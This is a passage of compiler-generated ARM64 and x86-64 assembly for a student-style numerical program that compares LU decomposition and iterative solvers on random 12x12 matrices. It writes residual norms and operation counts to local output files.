#160] ; 8-byte Folded Spill adrp x8, _luOps2@GOTPAGE ldr x8, [x8, _luOps2@GOTPAGEOFF] stur x8, [x29, #-152] ; 8-byte Folded Spill adrp x8, _itOps1@GOTPAGE ldr x8, [x8, _itOps1@GOTPAGEOFF] stur x8, [x29, #-144] ; 8-byte Folded Spill adrp x8, _itOps2@GOTPAGE ldr x8, [x8, _itOps2@GOTPAGEOFF] stur x8, [x29, #-136] ; 8-byte Folded Spill stur wzr, [x29, #-20] adrp x8, lCPI14_2@PAGE ldr d0, [x8, lCPI14_2@PAGEOFF] stur d0, [x29, #-96] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fopen stur x0, [x29, #-128] stur wzr, [x29, #-108] b LBB14_1 LBB14_1: ; =>This Loop Header: Depth=1 ; Child Loop BB14_6 Depth 2 ; Child Loop BB14_10 Depth 2 ; Child Loop BB14_14 Depth 2 ; Child Loop BB14_18 Depth 2 ; Child Loop BB14_22 Depth 2 ; Child Loop BB14_26 Depth 2 ldur w8, [x29, #-108] subs w8, w8, #3000 cset w8, hs tbnz w8, #0, LBB14_31 b LBB14_2 LBB14_2: ; in Loop: Header=BB14_1 Depth=1 mov w0, #12 str w0, [sp, #156] ; 4-byte Folded Spill bl _CreateMatrix mov x8, x0 ldr w0, [sp, #156] ; 4-byte Folded Reload stur x8, [x29, #-32] bl _CreateVector ldr w2, [sp, #156] ; 4-byte Folded Reload stur x0, [x29, #-48] ldur x0, [x29, #-32] ldur x1, [x29, #-48] bl _MatrixMul ldr w1, [sp, #156] ; 4-byte Folded Reload stur x0, [x29, #-40] ldur x0, [x29, #-32] bl _GetCond stur d0, [x29, #-120] ldur d0, [x29, #-120] fcmp d0, #0.0 cset w8, ls tbnz w8, #0, LBB14_4 b LBB14_3 LBB14_3: ; in Loop: Header=BB14_1 Depth=1 ldur d0, [x29, #-120] adrp x8, lCPI14_0@PAGE ldr d1, [x8, lCPI14_0@PAGEOFF] fcmp d0, d1 cset w8, lt tbnz w8, #0, LBB14_5 b LBB14_4 LBB14_4: ; in Loop: Header=BB14_1 Depth=1 b LBB14_30 LBB14_5: ; in Loop: Header=BB14_1 Depth=1 ldur x0, [x29, #-128] ldur d0, [x29, #-120] mov x8, sp str d0, [x8] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fprintf ldr x9, [sp, #160] ; 8-byte Folded Reload ldur x8, [x29, #-152] ; 8-byte Folded Reload str wzr, [x9] str wzr, [x8] mov x0, #144 str x0, [sp, #112] ; 8-byte Folded Spill mov x1, #8 str x1, [sp, #144] ; 8-byte Folded Spill bl _calloc ldr x1, [sp, #144] ; 8-byte Folded Reload mov x8, x0 ldr x0, [sp, #112] ; 8-byte Folded Reload sub x9, x29, #64 str x9, [sp, #120] ; 8-byte Folded Spill stur x8, [x29, #-64] bl _calloc ldr x2, [sp, #120] ; 8-byte Folded Reload sub x3, x29, #72 stur x0, [x29, #-72] ldur x0, [x29, #-32] mov w1, #12 str w1, [sp, #140] ; 4-byte Folded Spill bl _CreateLUMatrix ldr w2, [sp, #140] ; 4-byte Folded Reload ldur x0, [x29, #-64] ldur x1, [x29, #-72] ldur x3, [x29, #-40] bl _Solution stur x0, [x29, #-56] ldur x0, [x29, #-64] bl _free ldur x0, [x29, #-72] bl _free ldr w2, [sp, #140] ; 4-byte Folded Reload ldur x8, [x29, #-128] str x8, [sp, #128] ; 8-byte Folded Spill ldur x0, [x29, #-48] ldur x1, [x29, #-56] bl _VectSub ldr w1, [sp, #140] ; 4-byte Folded Reload bl _FindNorm ldr x0, [sp, #128] ; 8-byte Folded Reload mov x8, sp str d0, [x8] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf ldur x0, [x29, #-56] bl _free ldur x9, [x29, #-144] ; 8-byte Folded Reload ldur x8, [x29, #-136] ; 8-byte Folded Reload ldr w1, [sp, #140] ; 4-byte Folded Reload str wzr, [x9] str wzr, [x8] ldur x0, [x29, #-32] bl _CreateAlphaMatrix ldr w2, [sp, #140] ; 4-byte Folded Reload stur x0, [x29, #-80] ldur x0, [x29, #-40] ldur x1, [x29, #-32] bl _CreateBetaVector ldr x1, [sp, #144] ; 8-byte Folded Reload stur x0, [x29, #-88] mov x0, #12 bl _calloc stur x0, [x29, #-56] stur wzr, [x29, #-100] b LBB14_6 LBB14_6: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-100] subs w8, w8, #12 cset w8, hs tbnz w8, #0, LBB14_9 b LBB14_7 LBB14_7: ; in Loop: Header=BB14_6 Depth=2 ldur x8, [x29, #-88] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 ldr d0, [x8, x9, lsl #3] ldur x8, [x29, #-56] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 str d0, [x8, x9, lsl #3] b LBB14_8 LBB14_8: ; in Loop: Header=BB14_6 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_6 LBB14_9: ; in Loop: Header=BB14_1 Depth=1 stur wzr, [x29, #-100] b LBB14_10 LBB14_10: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x9, [x29, #-152] ; 8-byte Folded Reload ldur x8, [x29, #-136] ; 8-byte Folded Reload ldr w8, [x8] ldr w9, [x9] subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB14_13 b LBB14_11 LBB14_11: ; in Loop: Header=BB14_10 Depth=2 ldur x0, [x29, #-88] ldur x1, [x29, #-80] ldur x2, [x29, #-56] mov w3, #12 bl _CreateXVector stur x0, [x29, #-56] b LBB14_12 LBB14_12: ; in Loop: Header=BB14_10 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_10 LBB14_13: ; in Loop: Header=BB14_1 Depth=1 ldur x8, [x29, #-128] str x8, [sp, #96] ; 8-byte Folded Spill ldur x0, [x29, #-48] ldur x1, [x29, #-56] mov w2, #12 str w2, [sp, #108] ; 4-byte Folded Spill bl _VectSub ldr w1, [sp, #108] ; 4-byte Folded Reload bl _FindNorm ldr x0, [sp, #96] ; 8-byte Folded Reload mov x8, sp str d0, [x8] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf ldur x0, [x29, #-80] bl _free ldur x0, [x29, #-88] bl _free ldur x9, [x29, #-144] ; 8-byte Folded Reload ldur x8, [x29, #-136] ; 8-byte Folded Reload ldr w1, [sp, #108] ; 4-byte Folded Reload str wzr, [x9] str wzr, [x8] ldur x0, [x29, #-32] bl _CreateAlphaMatrix ldr w2, [sp, #108] ; 4-byte Folded Reload stur x0, [x29, #-80] ldur x0, [x29, #-40] ldur x1, [x29, #-32] bl _CreateBetaVector stur x0, [x29, #-88] mov x0, #12 mov x1, #8 bl _calloc stur x0, [x29, #-56] stur wzr, [x29, #-100] b LBB14_14 LBB14_14: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-100] subs w8, w8, #12 cset w8, hs tbnz w8, #0, LBB14_17 b LBB14_15 LBB14_15: ; in Loop: Header=BB14_14 Depth=2 ldur x8, [x29, #-88] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 ldr d0, [x8, x9, lsl #3] ldur x8, [x29, #-56] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 str d0, [x8, x9, lsl #3] b LBB14_16 LBB14_16: ; in Loop: Header=BB14_14 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_14 LBB14_17: ; in Loop: Header=BB14_1 Depth=1 stur wzr, [x29, #-100] b LBB14_18 LBB14_18: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x9, [x29, #-152] ; 8-byte Folded Reload ldur x8, [x29, #-136] ; 8-byte Folded Reload ldr w8, [x8] ldr w9, [x9] mov w10, #2 udiv w9, w9, w10 subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB14_21 b LBB14_19 LBB14_19: ; in Loop: Header=BB14_18 Depth=2 ldur x0, [x29, #-88] ldur x1, [x29, #-80] ldur x2, [x29, #-56] mov w3, #12 bl _CreateXVector stur x0, [x29, #-56] b LBB14_20 LBB14_20: ; in Loop: Header=BB14_18 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_18 LBB14_21: ; in Loop: Header=BB14_1 Depth=1 ldur x8, [x29, #-128] str x8, [sp, #80] ; 8-byte Folded Spill ldur x0, [x29, #-48] ldur x1, [x29, #-56] mov w2, #12 str w2, [sp, #92] ; 4-byte Folded Spill bl _VectSub ldr w1, [sp, #92] ; 4-byte Folded Reload bl _FindNorm ldr x0, [sp, #80] ; 8-byte Folded Reload mov x8, sp str d0, [x8] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf ldur x0, [x29, #-80] bl _free ldur x0, [x29, #-88] bl _free ldur x9, [x29, #-144] ; 8-byte Folded Reload ldur x8, [x29, #-136] ; 8-byte Folded Reload ldr w1, [sp, #92] ; 4-byte Folded Reload str wzr, [x9] str wzr, [x8] ldur x0, [x29, #-32] bl _CreateAlphaMatrix ldr w2, [sp, #92] ; 4-byte Folded Reload stur x0, [x29, #-80] ldur x0, [x29, #-40] ldur x1, [x29, #-32] bl _CreateBetaVector stur x0, [x29, #-88] mov x0, #12 mov x1, #8 bl _calloc stur x0, [x29, #-56] stur wzr, [x29, #-100] b LBB14_22 LBB14_22: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-100] subs w8, w8, #12 cset w8, hs tbnz w8, #0, LBB14_25 b LBB14_23 LBB14_23: ; in Loop: Header=BB14_22 Depth=2 ldur x8, [x29, #-88] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 ldr d0, [x8, x9, lsl #3] ldur x8, [x29, #-56] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 str d0, [x8, x9, lsl #3] b LBB14_24 LBB14_24: ; in Loop: Header=BB14_22 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_22 LBB14_25: ; in Loop: Header=BB14_1 Depth=1 stur wzr, [x29, #-100] b LBB14_26 LBB14_26: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x9, [x29, #-152] ; 8-byte Folded Reload ldur x8, [x29, #-136] ; 8-byte Folded Reload ldr w8, [x8] ldr w9, [x9] subs w8, w8, w9, lsl #1 cset w8, hi tbnz w8, #0, LBB14_29 b LBB14_27 LBB14_27: ; in Loop: Header=BB14_26 Depth=2 ldur x0, [x29, #-88] ldur x1, [x29, #-80] ldur x2, [x29, #-56] mov w3, #12 bl _CreateXVector stur x0, [x29, #-56] b LBB14_28 LBB14_28: ; in Loop: Header=BB14_26 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_26 LBB14_29: ; in Loop: Header=BB14_1 Depth=1 ldur x8, [x29, #-128] str x8, [sp, #72] ; 8-byte Folded Spill ldur x0, [x29, #-48] ldur x1, [x29, #-56] mov w2, #12 str w2, [sp, #68] ; 4-byte Folded Spill bl _VectSub ldr w1, [sp, #68] ; 4-byte Folded Reload bl _FindNorm ldr x0, [sp, #72] ; 8-byte Folded Reload mov x8, sp str d0, [x8] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _fprintf ldur x0, [x29, #-80] bl _free ldur x0, [x29, #-88] bl _free ldur x0, [x29, #-32] bl _free ldur x0, [x29, #-40] bl _free ldur x0, [x29, #-48] bl _free ldur x0, [x29, #-56] bl _free b LBB14_30 LBB14_30: ; in Loop: Header=BB14_1 Depth=1 ldur w8, [x29, #-108] add w8, w8, #1 stur w8, [x29, #-108] b LBB14_1 LBB14_31: ldur x0, [x29, #-128] bl _fclose adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fopen stur x0, [x29, #-128] adrp x8, lCPI14_1@PAGE ldr d0, [x8, lCPI14_1@PAGEOFF] stur d0, [x29, #-96] b LBB14_32 LBB14_32: ; =>This Loop Header: Depth=1 ; Child Loop BB14_34 Depth 2 ; Child Loop BB14_38 Depth 2 ldur d0, [x29, #-96] fmov d1, #1.00000000 fcmp d0, d1 cset w8, pl tbnz w8, #0, LBB14_43 b LBB14_33 LBB14_33: ; in Loop: Header=BB14_32 Depth=1 mov w0, #12 str w0, [sp, #52] ; 4-byte Folded Spill bl _CreateMatrix mov x8, x0 ldr w0, [sp, #52] ; 4-byte Folded Reload stur x8, [x29, #-32] bl _CreateVector ldr w2, [sp, #52] ; 4-byte Folded Reload stur x0, [x29, #-48] ldur x0, [x29, #-32] ldur x1, [x29, #-48] bl _MatrixMul ldr w1, [sp, #52] ; 4-byte Folded Reload stur x0, [x29, #-40] ldur x0, [x29, #-32] bl _GetCond stur d0, [x29, #-120] ldur x0, [x29, #-128] ldur d0, [x29, #-96] mov x8, sp str d0, [x8] adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _fprintf ldr x9, [sp, #160] ; 8-byte Folded Reload ldur x8, [x29, #-152] ; 8-byte Folded Reload str wzr, [x9] str wzr, [x8] mov x0, #144 str x0, [sp, #32] ; 8-byte Folded Spill mov x1, #8 str x1, [sp, #56] ; 8-byte Folded Spill bl _calloc ldr x1, [sp, #56] ; 8-byte Folded Reload mov x8, x0 ldr x0, [sp, #32] ; 8-byte Folded Reload sub x9, x29, #64 str x9, [sp, #40] ; 8-byte Folded Spill stur x8, [x29, #-64] bl _calloc ldr x2, [sp, #40] ; 8-byte Folded Reload ldr w1, [sp, #52] ; 4-byte Folded Reload sub x3, x29, #72 stur x0, [x29, #-72] ldur x0, [x29, #-32] bl _CreateLUMatrix ldr w2, [sp, #52] ; 4-byte Folded Reload ldur x0, [x29, #-64] ldur x1, [x29, #-72] ldur x3, [x29, #-40] bl _Solution stur x0, [x29, #-56] ldur x0, [x29, #-64] bl _free ldur x0, [x29, #-72] bl _free ldur x0, [x29, #-56] bl _free ldr x9, [sp, #160] ; 8-byte Folded Reload ldur x8, [x29, #-152] ; 8-byte Folded Reload ldur x0, [x29, #-128] ldr w9, [x9] ; implicit-def: $x10 mov x10, x9 ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF bl _fprintf ldur x9, [x29, #-144] ; 8-byte Folded Reload ldur x8, [x29, #-136] ; 8-byte Folded Reload ldr w1, [sp, #52] ; 4-byte Folded Reload str wzr, [x9] str wzr, [x8] ldur x0, [x29, #-32] bl _CreateAlphaMatrix ldr w2, [sp, #52] ; 4-byte Folded Reload stur x0, [x29, #-80] ldur x0, [x29, #-40] ldur x1, [x29, #-32] bl _CreateBetaVector ldr x1, [sp, #56] ; 8-byte Folded Reload stur x0, [x29, #-88] mov x0, #12 bl _calloc stur x0, [x29, #-56] stur wzr, [x29, #-100] b LBB14_34 LBB14_34: ; Parent Loop BB14_32 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-100] subs w8, w8, #12 cset w8, hs tbnz w8, #0, LBB14_37 b LBB14_35 LBB14_35: ; in Loop: Header=BB14_34 Depth=2 ldur x8, [x29, #-88] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 ldr d0, [x8, x9, lsl #3] ldur x8, [x29, #-56] ldur w9, [x29, #-100] ; kill: def $x9 killed $w9 str d0, [x8, x9, lsl #3] b LBB14_36 LBB14_36: ; in Loop: Header=BB14_34 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_34 LBB14_37: ; in Loop: Header=BB14_32 Depth=1 stur wzr, [x29, #-100] b LBB14_38 LBB14_38: ; Parent Loop BB14_32 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x0, [x29, #-48] ldur x1, [x29, #-56] mov w2, #12 str w2, [sp, #28] ; 4-byte Folded Spill bl _VectSub ldr w1, [sp, #28] ; 4-byte Folded Reload bl _FindNorm ldur d1, [x29, #-96] fcmp d0, d1 cset w8, le tbnz w8, #0, LBB14_41 b LBB14_39 LBB14_39: ; in Loop: Header=BB14_38 Depth=2 ldur x0, [x29, #-88] ldur x1, [x29, #-80] ldur x2, [x29, #-56] mov w3, #12 bl _CreateXVector stur x0, [x29, #-56] b LBB14_40 LBB14_40: ; in Loop: Header=BB14_38 Depth=2 ldur w8, [x29, #-100] add w8, w8, #1 stur w8, [x29, #-100] b LBB14_38 LBB14_41: ; in Loop: Header=BB14_32 Depth=1 ldur x8, [x29, #-136] ; 8-byte Folded Reload ldur x9, [x29, #-144] ; 8-byte Folded Reload ldur x0, [x29, #-128] ldr w9, [x9] ; implicit-def: $x10 mov x10, x9 ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.11@PAGE add x1, x1, l_.str.11@PAGEOFF bl _fprintf ldur x0, [x29, #-80] bl _free ldur x0, [x29, #-88] bl _free ldur x0, [x29, #-32] bl _free ldur x0, [x29, #-40] bl _free ldur x0, [x29, #-48] bl _free ldur x0, [x29, #-56] bl _free b LBB14_42 LBB14_42: ; in Loop: Header=BB14_32 Depth=1 ldur d0, [x29, #-96] fmov d1, #10.00000000 fmul d0, d0, d1 stur d0, [x29, #-96] b LBB14_32 LBB14_43: ldur x0, [x29, #-128] bl _fclose mov w0, #0 ldp x29, x30, [sp, #320] ; 16-byte Folded Reload ldp x28, x27, [sp, #304] ; 16-byte Folded Reload add sp, sp, #336 ret .cfi_endproc ; -- End function .comm _luOps2,4,2 ; @luOps2 .comm _luOps1,4,2 ; @luOps1 .comm _itOps2,4,2 ; @itOps2 .comm _itOps1,4,2 ; @itOps1 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%lf " l_.str.1: ; @.str.1 .asciz "\n" .section __TEXT,__const l_.str.2: ; @.str.2 .space 2 .section __TEXT,__cstring,cstring_literals l_.str.3: ; @.str.3 .asciz "../output1.txt" l_.str.4: ; @.str.4 .asciz "w" l_.str.5: ; @.str.5 .asciz "%.30lf " l_.str.6: ; @.str.6 .asciz "%.15lf " l_.str.7: ; @.str.7 .asciz "%.15lf\n" l_.str.8: ; @.str.8 .asciz "../output2.txt" l_.str.9: ; @.str.9 .asciz "%.13lf " l_.str.10: ; @.str.10 .asciz "%i %i " l_.str.11: ; @.str.11 .asciz "%i %i\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function CreateMatrix LCPI0_0: .quad 0x4014000000000000 ## double 5 .section __TEXT,__text,regular,pure_instructions .globl _CreateMatrix .p2align 4, 0x90 _CreateMatrix: ## @CreateMatrix .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl $0, -16(%rbp) movslq -4(%rbp), %rdi shlq $3, %rdi movslq -4(%rbp), %rax imulq %rax, %rdi callq _malloc movq %rax, -24(%rbp) movl $0, -8(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 movl -8(%rbp), %eax cmpl -4(%rbp), %eax jge LBB0_8 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 xorps %xmm0, %xmm0 movsd %xmm0, -32(%rbp) movl $0, -12(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -12(%rbp), %eax cmpl -4(%rbp), %eax jge LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 callq _rand movl $9, %ecx cltd idivl %ecx addl $1, %edx movl %edx, -16(%rbp) cvtsi2sdl -16(%rbp), %xmm0 movq -24(%rbp), %rax movl -8(%rbp), %ecx imull -4(%rbp), %ecx addl -12(%rbp), %ecx movslq %ecx, %rcx movsd %xmm0, (%rax,%rcx,8) cvtsi2sdl -16(%rbp), %xmm0 addsd -32(%rbp), %xmm0 movsd %xmm0, -32(%rbp) ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_3 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero addsd -32(%rbp), %xmm0 movq -24(%rbp), %rax movl -8(%rbp), %ecx imull -4(%rbp), %ecx addl -8(%rbp), %ecx movslq %ecx, %rcx movsd %xmm0, (%rax,%rcx,8) ## %bb.7: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_8: movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _CreateVector ## -- Begin function CreateVector .p2align 4, 0x90 _CreateVector: ## @CreateVector .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movslq -4(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, -16(%rbp) movl $0, -8(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -8(%rbp), %eax cmpl -4(%rbp), %eax jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 callq _rand movl $10, %ecx cltd idivl %ecx cvtsi2sd %edx, %xmm0 movq -16(%rbp), %rax movslq -8(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB1_1 LBB1_4: movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _GetCond ## -- Begin function GetCond .p2align 4, 0x90 _GetCond: ## @GetCond .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movq -8(%rbp), %rdi movl -12(%rbp), %esi callq _NormMatrix movsd %xmm0, -24(%rbp) ## 8-byte Spill movq -8(%rbp), %rdi movl -12(%rbp), %esi callq _InvMatrix movq %rax, %rdi movl -12(%rbp), %esi callq _NormMatrix movaps %xmm0, %xmm1 movsd -24(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _NormMatrix ## -- Begin function NormMatrix .p2align 4, 0x90 _NormMatrix: ## @NormMatrix .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -32(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -40(%rbp) movl $0, -16(%rbp) LBB3_1: ## =>This Loop Header: Depth=1 ## Child Loop BB3_3 Depth 2 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB3_8 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movl $0, -20(%rbp) LBB3_3: ## Parent Loop BB3_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB3_6 ## %bb.4: ## in Loop: Header=BB3_3 Depth=2 movq -8(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -8(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movsd -40(%rbp), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, -40(%rbp) ## %bb.5: ## in Loop: Header=BB3_3 Depth=2 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB3_3 LBB3_6: ## in Loop: Header=BB3_1 Depth=1 jmp LBB3_7 LBB3_7: ## in Loop: Header=BB3_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB3_1 LBB3_8: movsd -40(%rbp), %xmm0 ## xmm0 = mem[0],zero sqrtsd %xmm0, %xmm0 movsd %xmm0, -32(%rbp) movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function InvMatrix LCPI4_0: .quad 0x3ff0000000000000 ## double 1 .section __TEXT,__text,regular,pure_instructions .globl _InvMatrix .p2align 4, 0x90 _InvMatrix: ## @InvMatrix .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movslq -12(%rbp), %rdi shlq $3, %rdi movslq -12(%rbp), %rax imulq %rax, %rdi callq _malloc movq %rax, -40(%rbp) movslq -12(%rbp), %rdi shlq $3, %rdi movslq -12(%rbp), %rax imulq %rax, %rdi callq _malloc movq %rax, -48(%rbp) movl $0, -16(%rbp) LBB4_1: ## =>This Loop Header: Depth=1 ## Child Loop BB4_3 Depth 2 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_8 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movl $0, -20(%rbp) LBB4_3: ## Parent Loop BB4_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_6 ## %bb.4: ## in Loop: Header=BB4_3 Depth=2 movq -8(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -48(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd %xmm0, (%rax,%rcx,8) ## %bb.5: ## in Loop: Header=BB4_3 Depth=2 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_3 LBB4_6: ## in Loop: Header=BB4_1 Depth=1 jmp LBB4_7 LBB4_7: ## in Loop: Header=BB4_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB4_1 LBB4_8: movl $0, -16(%rbp) LBB4_9: ## =>This Loop Header: Depth=1 ## Child Loop BB4_11 Depth 2 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_18 ## %bb.10: ## in Loop: Header=BB4_9 Depth=1 movl $0, -20(%rbp) LBB4_11: ## Parent Loop BB4_9 Depth=1 ## => This Inner Loop Header: Depth=2 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_16 ## %bb.12: ## in Loop: Header=BB4_11 Depth=2 movq -40(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx xorps %xmm0, %xmm0 movsd %xmm0, (%rax,%rcx,8) movl -16(%rbp), %eax cmpl -20(%rbp), %eax jne LBB4_14 ## %bb.13: ## in Loop: Header=BB4_11 Depth=2 movq -40(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd LCPI4_0(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, (%rax,%rcx,8) LBB4_14: ## in Loop: Header=BB4_11 Depth=2 jmp LBB4_15 LBB4_15: ## in Loop: Header=BB4_11 Depth=2 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_11 LBB4_16: ## in Loop: Header=BB4_9 Depth=1 jmp LBB4_17 LBB4_17: ## in Loop: Header=BB4_9 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB4_9 LBB4_18: movl $0, -24(%rbp) LBB4_19: ## =>This Loop Header: Depth=1 ## Child Loop BB4_21 Depth 2 ## Child Loop BB4_25 Depth 2 ## Child Loop BB4_27 Depth 3 movl -24(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_34 ## %bb.20: ## in Loop: Header=BB4_19 Depth=1 movq -48(%rbp), %rax movl -24(%rbp), %ecx imull -12(%rbp), %ecx addl -24(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -32(%rbp) movl $0, -20(%rbp) LBB4_21: ## Parent Loop BB4_19 Depth=1 ## => This Inner Loop Header: Depth=2 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_24 ## %bb.22: ## in Loop: Header=BB4_21 Depth=2 movsd -32(%rbp), %xmm1 ## xmm1 = mem[0],zero movq -48(%rbp), %rax movl -24(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), 